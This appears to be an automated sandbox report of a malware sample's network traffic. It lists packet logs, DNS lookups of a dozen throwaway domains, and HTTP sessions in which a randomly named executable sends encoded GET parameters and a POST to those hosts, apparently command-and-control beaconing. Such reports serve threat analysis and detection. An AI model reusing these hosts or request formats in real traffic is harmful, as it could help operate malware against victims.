                                                                                                      Oct 8, 2024 15:55:55.582835913 CEST4999580192.168.2.1181.2.196.19
                                                                                                      Oct 8, 2024 15:55:55.587862968 CEST804999581.2.196.19192.168.2.11
                                                                                                      Oct 8, 2024 15:55:55.587929964 CEST4999580192.168.2.1181.2.196.19
                                                                                                      Oct 8, 2024 15:55:55.602183104 CEST4999580192.168.2.1181.2.196.19
                                                                                                      Oct 8, 2024 15:55:55.607316017 CEST804999581.2.196.19192.168.2.11
                                                                                                      Oct 8, 2024 15:55:56.264822960 CEST804999581.2.196.19192.168.2.11
                                                                                                      Oct 8, 2024 15:55:56.265010118 CEST804999581.2.196.19192.168.2.11
                                                                                                      Oct 8, 2024 15:55:56.268745899 CEST4999580192.168.2.1181.2.196.19
                                                                                                      Oct 8, 2024 15:55:57.110132933 CEST4999580192.168.2.1181.2.196.19
                                                                                                      Oct 8, 2024 15:55:58.129147053 CEST4999680192.168.2.1181.2.196.19
                                                                                                      Oct 8, 2024 15:55:58.277229071 CEST804999681.2.196.19192.168.2.11
                                                                                                      Oct 8, 2024 15:55:58.277360916 CEST4999680192.168.2.1181.2.196.19
                                                                                                      Oct 8, 2024 15:55:58.290016890 CEST4999680192.168.2.1181.2.196.19
                                                                                                      Oct 8, 2024 15:55:58.295316935 CEST804999681.2.196.19192.168.2.11
                                                                                                      Oct 8, 2024 15:55:58.295473099 CEST804999681.2.196.19192.168.2.11
                                                                                                      Oct 8, 2024 15:55:58.941078901 CEST804999681.2.196.19192.168.2.11
                                                                                                      Oct 8, 2024 15:55:58.941274881 CEST804999681.2.196.19192.168.2.11
                                                                                                      Oct 8, 2024 15:55:58.941631079 CEST4999680192.168.2.1181.2.196.19
                                                                                                      Oct 8, 2024 15:55:59.797810078 CEST4999680192.168.2.1181.2.196.19
                                                                                                      Oct 8, 2024 15:56:00.816277981 CEST4999780192.168.2.1181.2.196.19
                                                                                                      Oct 8, 2024 15:56:00.821150064 CEST804999781.2.196.19192.168.2.11
                                                                                                      Oct 8, 2024 15:56:00.822827101 CEST4999780192.168.2.1181.2.196.19
                                                                                                      Oct 8, 2024 15:56:00.831670046 CEST4999780192.168.2.1181.2.196.19
                                                                                                      Oct 8, 2024 15:56:00.836626053 CEST804999781.2.196.19192.168.2.11
                                                                                                      Oct 8, 2024 15:56:01.492780924 CEST804999781.2.196.19192.168.2.11
                                                                                                      Oct 8, 2024 15:56:01.505907059 CEST804999781.2.196.19192.168.2.11
                                                                                                      Oct 8, 2024 15:56:01.506046057 CEST4999780192.168.2.1181.2.196.19
                                                                                                      Oct 8, 2024 15:56:01.507677078 CEST4999780192.168.2.1181.2.196.19
                                                                                                      Oct 8, 2024 15:56:01.512578011 CEST804999781.2.196.19192.168.2.11
                                                                                                      Oct 8, 2024 15:56:06.917207003 CEST4999880192.168.2.11107.163.130.249
                                                                                                      Oct 8, 2024 15:56:06.922080040 CEST8049998107.163.130.249192.168.2.11
                                                                                                      Oct 8, 2024 15:56:06.922319889 CEST4999880192.168.2.11107.163.130.249
                                                                                                      Oct 8, 2024 15:56:06.935695887 CEST4999880192.168.2.11107.163.130.249
                                                                                                      Oct 8, 2024 15:56:06.941509962 CEST8049998107.163.130.249192.168.2.11
                                                                                                      Oct 8, 2024 15:56:07.827970028 CEST8049998107.163.130.249192.168.2.11
                                                                                                      Oct 8, 2024 15:56:07.828087091 CEST8049998107.163.130.249192.168.2.11
                                                                                                      Oct 8, 2024 15:56:07.828207970 CEST4999880192.168.2.11107.163.130.249
                                                                                                      Oct 8, 2024 15:56:08.439418077 CEST4999880192.168.2.11107.163.130.249
                                                                                                      Oct 8, 2024 15:56:09.459098101 CEST4999980192.168.2.11107.163.130.249
                                                                                                      Oct 8, 2024 15:56:09.464231014 CEST8049999107.163.130.249192.168.2.11
                                                                                                      Oct 8, 2024 15:56:09.464360952 CEST4999980192.168.2.11107.163.130.249
                                                                                                      Oct 8, 2024 15:56:09.481554985 CEST4999980192.168.2.11107.163.130.249
                                                                                                      Oct 8, 2024 15:56:09.486529112 CEST8049999107.163.130.249192.168.2.11
                                                                                                      Oct 8, 2024 15:56:10.342489958 CEST8049999107.163.130.249192.168.2.11
                                                                                                      Oct 8, 2024 15:56:10.342627048 CEST8049999107.163.130.249192.168.2.11
                                                                                                      Oct 8, 2024 15:56:10.342788935 CEST4999980192.168.2.11107.163.130.249
                                                                                                      Oct 8, 2024 15:56:10.984837055 CEST4999980192.168.2.11107.163.130.249
                                                                                                      Oct 8, 2024 15:56:12.005001068 CEST5000080192.168.2.11107.163.130.249
                                                                                                      Oct 8, 2024 15:56:12.010185957 CEST8050000107.163.130.249192.168.2.11
                                                                                                      Oct 8, 2024 15:56:12.016926050 CEST5000080192.168.2.11107.163.130.249
                                                                                                      Oct 8, 2024 15:56:12.028846025 CEST5000080192.168.2.11107.163.130.249
                                                                                                      Oct 8, 2024 15:56:12.034176111 CEST8050000107.163.130.249192.168.2.11
                                                                                                      Oct 8, 2024 15:56:12.034203053 CEST8050000107.163.130.249192.168.2.11
                                                                                                      Oct 8, 2024 15:56:13.127681017 CEST8050000107.163.130.249192.168.2.11
                                                                                                      Oct 8, 2024 15:56:13.128226995 CEST8050000107.163.130.249192.168.2.11
                                                                                                      Oct 8, 2024 15:56:13.128271103 CEST5000080192.168.2.11107.163.130.249
                                                                                                      Oct 8, 2024 15:56:13.532577991 CEST5000080192.168.2.11107.163.130.249
                                                                                                      Oct 8, 2024 15:56:14.550853968 CEST5000180192.168.2.11107.163.130.249
                                                                                                      Oct 8, 2024 15:56:14.555854082 CEST8050001107.163.130.249192.168.2.11
                                                                                                      Oct 8, 2024 15:56:14.555985928 CEST5000180192.168.2.11107.163.130.249
                                                                                                      Oct 8, 2024 15:56:14.563930035 CEST5000180192.168.2.11107.163.130.249
                                                                                                      Oct 8, 2024 15:56:14.568831921 CEST8050001107.163.130.249192.168.2.11
                                                                                                      Oct 8, 2024 15:56:15.481507063 CEST8050001107.163.130.249192.168.2.11
                                                                                                      Oct 8, 2024 15:56:15.481702089 CEST8050001107.163.130.249192.168.2.11
                                                                                                      Oct 8, 2024 15:56:15.481714010 CEST8050001107.163.130.249192.168.2.11
                                                                                                      Oct 8, 2024 15:56:15.481765032 CEST5000180192.168.2.11107.163.130.249
                                                                                                      Oct 8, 2024 15:56:15.481765032 CEST5000180192.168.2.11107.163.130.249
                                                                                                      Oct 8, 2024 15:56:15.485488892 CEST5000180192.168.2.11107.163.130.249
                                                                                                      Oct 8, 2024 15:56:15.742499113 CEST8050001107.163.130.249192.168.2.11
                                                                                                      Oct 8, 2024 15:56:15.742554903 CEST5000180192.168.2.11107.163.130.249
                                                                                                      Oct 8, 2024 15:56:15.743760109 CEST8050001107.163.130.249192.168.2.11
                                                                                                      Oct 8, 2024 15:56:29.474787951 CEST5000280192.168.2.11103.21.221.4
                                                                                                      Oct 8, 2024 15:56:29.480233908 CEST8050002103.21.221.4192.168.2.11
                                                                                                      Oct 8, 2024 15:56:29.480345011 CEST5000280192.168.2.11103.21.221.4
                                                                                                      Oct 8, 2024 15:56:29.495868921 CEST5000280192.168.2.11103.21.221.4
                                                                                                      Oct 8, 2024 15:56:29.500838041 CEST8050002103.21.221.4192.168.2.11
                                                                                                      Oct 8, 2024 15:56:30.980561972 CEST8050002103.21.221.4192.168.2.11
                                                                                                      Oct 8, 2024 15:56:30.980583906 CEST8050002103.21.221.4192.168.2.11
                                                                                                      Oct 8, 2024 15:56:30.980595112 CEST8050002103.21.221.4192.168.2.11
                                                                                                      Oct 8, 2024 15:56:30.980849028 CEST5000280192.168.2.11103.21.221.4
                                                                                                      Oct 8, 2024 15:56:30.981065989 CEST8050002103.21.221.4192.168.2.11
                                                                                                      Oct 8, 2024 15:56:30.981077909 CEST8050002103.21.221.4192.168.2.11
                                                                                                      Oct 8, 2024 15:56:30.981087923 CEST8050002103.21.221.4192.168.2.11
                                                                                                      Oct 8, 2024 15:56:30.981100082 CEST8050002103.21.221.4192.168.2.11
                                                                                                      Oct 8, 2024 15:56:30.981111050 CEST8050002103.21.221.4192.168.2.11
                                                                                                      Oct 8, 2024 15:56:30.981189013 CEST5000280192.168.2.11103.21.221.4
                                                                                                      Oct 8, 2024 15:56:30.981189013 CEST5000280192.168.2.11103.21.221.4
                                                                                                      Oct 8, 2024 15:56:30.981332064 CEST8050002103.21.221.4192.168.2.11
                                                                                                      Oct 8, 2024 15:56:30.981343985 CEST8050002103.21.221.4192.168.2.11
                                                                                                      Oct 8, 2024 15:56:30.981674910 CEST5000280192.168.2.11103.21.221.4
                                                                                                      Oct 8, 2024 15:56:30.985984087 CEST8050002103.21.221.4192.168.2.11
                                                                                                      Oct 8, 2024 15:56:30.986001015 CEST8050002103.21.221.4192.168.2.11
                                                                                                      Oct 8, 2024 15:56:30.986016989 CEST8050002103.21.221.4192.168.2.11
                                                                                                      Oct 8, 2024 15:56:30.986105919 CEST5000280192.168.2.11103.21.221.4
                                                                                                      Oct 8, 2024 15:56:30.986105919 CEST5000280192.168.2.11103.21.221.4
                                                                                                      Oct 8, 2024 15:56:31.000559092 CEST5000280192.168.2.11103.21.221.4
                                                                                                      Oct 8, 2024 15:57:37.150161028 CEST5002280192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:37.161554098 CEST5002280192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:37.166615963 CEST805002243.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:57:38.673484087 CEST5002280192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:38.771317959 CEST805002243.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:57:39.692303896 CEST5002380192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:39.698402882 CEST805002343.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:57:39.698483944 CEST5002380192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:39.714010954 CEST5002380192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:39.719018936 CEST805002343.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:57:41.219310045 CEST5002380192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:41.271228075 CEST805002343.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:57:42.240793943 CEST5002480192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:42.423808098 CEST805002443.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:57:42.423926115 CEST5002480192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:42.435674906 CEST5002480192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:42.440591097 CEST805002443.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:57:42.440685034 CEST805002443.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:57:43.938045979 CEST5002480192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:43.983292103 CEST805002443.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:57:44.960820913 CEST5002580192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:44.966051102 CEST805002543.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:57:44.966166973 CEST5002580192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:44.974014997 CEST5002580192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:44.980477095 CEST805002543.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:57:58.532809019 CEST805002243.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:57:58.533169985 CEST5002280192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:58:01.095470905 CEST805002343.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:58:01.096963882 CEST5002380192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:58:03.799887896 CEST805002443.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:58:03.799952984 CEST5002480192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:58:06.365169048 CEST805002543.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:58:06.365309954 CEST5002580192.168.2.1143.154.104.247
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 15:54:54.496506929 CEST | 55293 | 53 | 192.168.2.11 | 1.1.1.1
Oct 8, 2024 15:54:54.524173975 CEST | 53 | 55293 | 1.1.1.1 | 192.168.2.11
Oct 8, 2024 15:55:10.119239092 CEST | 50244 | 53 | 192.168.2.11 | 1.1.1.1
Oct 8, 2024 15:55:10.559197903 CEST | 53 | 50244 | 1.1.1.1 | 192.168.2.11
Oct 8, 2024 15:55:24.083488941 CEST | 57989 | 53 | 192.168.2.11 | 1.1.1.1
Oct 8, 2024 15:55:24.258888006 CEST | 53 | 57989 | 1.1.1.1 | 192.168.2.11
Oct 8, 2024 15:55:38.567131042 CEST | 57641 | 53 | 192.168.2.11 | 1.1.1.1
Oct 8, 2024 15:55:38.983153105 CEST | 53 | 57641 | 1.1.1.1 | 192.168.2.11
Oct 8, 2024 15:55:52.957801104 CEST | 51852 | 53 | 192.168.2.11 | 1.1.1.1
Oct 8, 2024 15:55:53.033871889 CEST | 53 | 51852 | 1.1.1.1 | 192.168.2.11
Oct 8, 2024 15:56:06.519968987 CEST | 54083 | 53 | 192.168.2.11 | 1.1.1.1
Oct 8, 2024 15:56:06.914417028 CEST | 53 | 54083 | 1.1.1.1 | 192.168.2.11
Oct 8, 2024 15:56:20.504518032 CEST | 65316 | 53 | 192.168.2.11 | 1.1.1.1
Oct 8, 2024 15:56:21.358762980 CEST | 53 | 65316 | 1.1.1.1 | 192.168.2.11
Oct 8, 2024 15:56:29.427205086 CEST | 52420 | 53 | 192.168.2.11 | 1.1.1.1
Oct 8, 2024 15:56:29.470457077 CEST | 53 | 52420 | 1.1.1.1 | 192.168.2.11
Oct 8, 2024 15:56:43.350013971 CEST | 55350 | 53 | 192.168.2.11 | 1.1.1.1
Oct 8, 2024 15:56:43.365582943 CEST | 53 | 55350 | 1.1.1.1 | 192.168.2.11
Oct 8, 2024 15:56:56.524756908 CEST | 50836 | 53 | 192.168.2.11 | 1.1.1.1
Oct 8, 2024 15:56:56.547382116 CEST | 53 | 50836 | 1.1.1.1 | 192.168.2.11
Oct 8, 2024 15:57:09.991146088 CEST | 50996 | 53 | 192.168.2.11 | 1.1.1.1
Oct 8, 2024 15:57:10.024205923 CEST | 53 | 50996 | 1.1.1.1 | 192.168.2.11
Oct 8, 2024 15:57:23.145077944 CEST | 56868 | 53 | 192.168.2.11 | 1.1.1.1
Oct 8, 2024 15:57:23.187769890 CEST | 53 | 56868 | 1.1.1.1 | 192.168.2.11
Oct 8, 2024 15:57:36.457571983 CEST | 52420 | 53 | 192.168.2.11 | 1.1.1.1
Oct 8, 2024 15:57:37.138364077 CEST | 53 | 52420 | 1.1.1.1 | 192.168.2.11
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 8, 2024 15:54:54.496506929 CEST | 192.168.2.11 | 1.1.1.1 | 0x3d4d | Standard query (0) | www.whats-in-the-box.org | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:10.119239092 CEST | 192.168.2.11 | 1.1.1.1 | 0x88c | Standard query (0) | www.1183377.app | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:24.083488941 CEST | 192.168.2.11 | 1.1.1.1 | 0xd7eb | Standard query (0) | www.52ywq.vip | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:38.567131042 CEST | 192.168.2.11 | 1.1.1.1 | 0x2f8d | Standard query (0) | www.zenscape.top | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:52.957801104 CEST | 192.168.2.11 | 1.1.1.1 | 0x7ea | Standard query (0) | www.asociacia.online | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:56:06.519968987 CEST | 192.168.2.11 | 1.1.1.1 | 0x107b | Standard query (0) | www.93187.xyz | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:56:20.504518032 CEST | 192.168.2.11 | 1.1.1.1 | 0xb85 | Standard query (0) | www.insicilia.today | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:56:29.427205086 CEST | 192.168.2.11 | 1.1.1.1 | 0x61ec | Standard query (0) | www.tempatmudisini01.click | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:56:43.350013971 CEST | 192.168.2.11 | 1.1.1.1 | 0xb9d8 | Standard query (0) | www.o731lh.vip | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:56:56.524756908 CEST | 192.168.2.11 | 1.1.1.1 | 0xbd6c | Standard query (0) | www.consultarfacil.online | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:57:09.991146088 CEST | 192.168.2.11 | 1.1.1.1 | 0x8b4b | Standard query (0) | www.broomeorchard.xyz | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:57:23.145077944 CEST | 192.168.2.11 | 1.1.1.1 | 0x1a90 | Standard query (0) | www.suarahati20.xyz | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:57:36.457571983 CEST | 192.168.2.11 | 1.1.1.1 | 0xe13 | Standard query (0) | www.nmh6.site | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 8, 2024 15:54:54.524173975 CEST | 1.1.1.1 | 192.168.2.11 | 0x3d4d | No error (0) | www.whats-in-the-box.org | whats-in-the-box.org | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:54:54.524173975 CEST | 1.1.1.1 | 192.168.2.11 | 0x3d4d | No error (0) | whats-in-the-box.org | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:54:54.524173975 CEST | 1.1.1.1 | 192.168.2.11 | 0x3d4d | No error (0) | whats-in-the-box.org | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:10.559197903 CEST | 1.1.1.1 | 192.168.2.11 | 0x88c | No error (0) | www.1183377.app | r83l7k.asiagoogleantiddoscdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:55:10.559197903 CEST | 1.1.1.1 | 192.168.2.11 | 0x88c | No error (0) | r83l7k.asiagoogleantiddoscdn.com | hse6978h2.g.asiagoogleantiddoscdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:55:10.559197903 CEST | 1.1.1.1 | 192.168.2.11 | 0x88c | No error (0) | hse6978h2.g.asiagoogleantiddoscdn.com | | 23.224.37.76 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:10.559197903 CEST | 1.1.1.1 | 192.168.2.11 | 0x88c | No error (0) | hse6978h2.g.asiagoogleantiddoscdn.com | | 23.224.37.78 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:10.559197903 CEST | 1.1.1.1 | 192.168.2.11 | 0x88c | No error (0) | hse6978h2.g.asiagoogleantiddoscdn.com | | 23.225.60.59 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:10.559197903 CEST | 1.1.1.1 | 192.168.2.11 | 0x88c | No error (0) | hse6978h2.g.asiagoogleantiddoscdn.com | | 23.225.60.99 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:10.559197903 CEST | 1.1.1.1 | 192.168.2.11 | 0x88c | No error (0) | hse6978h2.g.asiagoogleantiddoscdn.com | | 156.251.233.3 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:10.559197903 CEST | 1.1.1.1 | 192.168.2.11 | 0x88c | No error (0) | hse6978h2.g.asiagoogleantiddoscdn.com | | 156.251.233.84 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:10.559197903 CEST | 1.1.1.1 | 192.168.2.11 | 0x88c | No error (0) | hse6978h2.g.asiagoogleantiddoscdn.com | | 156.251.233.85 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:10.559197903 CEST | 1.1.1.1 | 192.168.2.11 | 0x88c | No error (0) | hse6978h2.g.asiagoogleantiddoscdn.com | | 23.224.27.171 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:10.559197903 CEST | 1.1.1.1 | 192.168.2.11 | 0x88c | No error (0) | hse6978h2.g.asiagoogleantiddoscdn.com | | 23.224.27.173 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:24.258888006 CEST | 1.1.1.1 | 192.168.2.11 | 0xd7eb | No error (0) | www.52ywq.vip | 2rqff6.zxy-cname.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:55:24.258888006 CEST | 1.1.1.1 | 192.168.2.11 | 0xd7eb | No error (0) | 2rqff6.zxy-cname.com | xzwp.g.zxy-cname.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:55:24.258888006 CEST | 1.1.1.1 | 192.168.2.11 | 0xd7eb | No error (0) | xzwp.g.zxy-cname.com | | 20.184.53.162 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:24.258888006 CEST | 1.1.1.1 | 192.168.2.11 | 0xd7eb | No error (0) | xzwp.g.zxy-cname.com | | 52.187.43.40 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:24.258888006 CEST | 1.1.1.1 | 192.168.2.11 | 0xd7eb | No error (0) | xzwp.g.zxy-cname.com | | 20.190.75.237 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:24.258888006 CEST | 1.1.1.1 | 192.168.2.11 | 0xd7eb | No error (0) | xzwp.g.zxy-cname.com | | 52.230.116.182 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:24.258888006 CEST | 1.1.1.1 | 192.168.2.11 | 0xd7eb | No error (0) | xzwp.g.zxy-cname.com | | 20.184.51.15 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:24.258888006 CEST | 1.1.1.1 | 192.168.2.11 | 0xd7eb | No error (0) | xzwp.g.zxy-cname.com | | 52.187.42.58 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:38.983153105 CEST | 1.1.1.1 | 192.168.2.11 | 0x2f8d | No error (0) | www.zenscape.top | | 199.192.21.169 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:53.033871889 CEST | 1.1.1.1 | 192.168.2.11 | 0x7ea | No error (0) | www.asociacia.online | asociacia.online | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:55:53.033871889 CEST | 1.1.1.1 | 192.168.2.11 | 0x7ea | No error (0) | asociacia.online | | 81.2.196.19 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:56:06.914417028 CEST | 1.1.1.1 | 192.168.2.11 | 0x107b | No error (0) | www.93187.xyz | | 107.163.130.249 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:56:21.358762980 CEST | 1.1.1.1 | 192.168.2.11 | 0xb85 | Name error (3) | www.insicilia.today | none | none | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:56:29.470457077 CEST | 1.1.1.1 | 192.168.2.11 | 0x61ec | No error (0) | www.tempatmudisini01.click | tempatmudisini01.click | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:56:29.470457077 CEST | 1.1.1.1 | 192.168.2.11 | 0x61ec | No error (0) | tempatmudisini01.click | | 103.21.221.4 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:56:43.365582943 CEST | 1.1.1.1 | 192.168.2.11 | 0xb9d8 | No error (0) | www.o731lh.vip | o731lh.vip | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:56:43.365582943 CEST | 1.1.1.1 | 192.168.2.11 | 0xb9d8 | No error (0) | o731lh.vip | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:56:43.365582943 CEST | 1.1.1.1 | 192.168.2.11 | 0xb9d8 | No error (0) | o731lh.vip | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:56:56.547382116 CEST | 1.1.1.1 | 192.168.2.11 | 0xbd6c | No error (0) | www.consultarfacil.online | consultarfacil.online | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:56:56.547382116 CEST | 1.1.1.1 | 192.168.2.11 | 0xbd6c | No error (0) | consultarfacil.online | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:56:56.547382116 CEST | 1.1.1.1 | 192.168.2.11 | 0xbd6c | No error (0) | consultarfacil.online | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:57:10.024205923 CEST | 1.1.1.1 | 192.168.2.11 | 0x8b4b | No error (0) | www.broomeorchard.xyz | | 15.197.204.56 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:57:10.024205923 CEST | 1.1.1.1 | 192.168.2.11 | 0x8b4b | No error (0) | www.broomeorchard.xyz | | 3.33.243.145 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:57:23.187769890 CEST | 1.1.1.1 | 192.168.2.11 | 0x1a90 | No error (0) | www.suarahati20.xyz | suarahati20.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:57:23.187769890 CEST | 1.1.1.1 | 192.168.2.11 | 0x1a90 | No error (0) | suarahati20.xyz | | 198.252.106.191 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:57:37.138364077 CEST | 1.1.1.1 | 192.168.2.11 | 0xe13 | No error (0) | www.nmh6.site | | 43.154.104.247 | A (IP address) | IN (0x0001) | false
• www.whats-in-the-box.org
• www.1183377.app
• www.52ywq.vip
• www.zenscape.top
• www.asociacia.online
• www.93187.xyz
• www.tempatmudisini01.click
• www.o731lh.vip
• www.consultarfacil.online
• www.broomeorchard.xyz
• www.suarahati20.xyz
• www.nmh6.site
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49981 | 3.33.130.190 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:54:54.544260025 CEST | 468 | OUT | GET /i7xp/?-L=kBMxZFRpAD6P&gP=1hYOXgym/+H9levAkr4ECV6rOYKZY3gLAuBEPSFmNBWW1UoBGm7krMakoIf2T8PCbakGk5cJYsK9Iz90f+By3ei+nF7KhZYXgTY0pVgzUu8kB5fl+xjkuOc= HTTP/1.1
Host: www.whats-in-the-box.org
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Oct 8, 2024 15:54:55.057811022 CEST | 394 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Tue, 08 Oct 2024 13:54:55 GMT
Content-Type: text/html
Content-Length: 254
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 2d 4c 3d 6b 42 4d 78 5a 46 52 70 41 44 36 50 26 67 50 3d 31 68 59 4f 58 67 79 6d 2f 2b 48 39 6c 65 76 41 6b 72 34 45 43 56 36 72 4f 59 4b 5a 59 33 67 4c 41 75 42 45 50 53 46 6d 4e 42 57 57 31 55 6f 42 47 6d 37 6b 72 4d 61 6b 6f 49 66 32 54 38 50 43 62 61 6b 47 6b 35 63 4a 59 73 4b 39 49 7a 39 30 66 2b 42 79 33 65 69 2b 6e 46 37 4b 68 5a 59 58 67 54 59 30 70 56 67 7a 55 75 38 6b 42 35 66 6c 2b 78 6a 6b 75 4f 63 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?-L=kBMxZFRpAD6P&gP=1hYOXgym/+H9levAkr4ECV6rOYKZY3gLAuBEPSFmNBWW1UoBGm7krMakoIf2T8PCbakGk5cJYsK9Iz90f+By3ei+nF7KhZYXgTY0pVgzUu8kB5fl+xjkuOc="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.11 | 49982 | 23.224.37.76 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:55:10.579591990 CEST | 721 | OUT | POST /8z5k/ HTTP/1.1
Host: www.1183377.app
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 199
Origin: http://www.1183377.app
Referer: http://www.1183377.app/8z5k/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
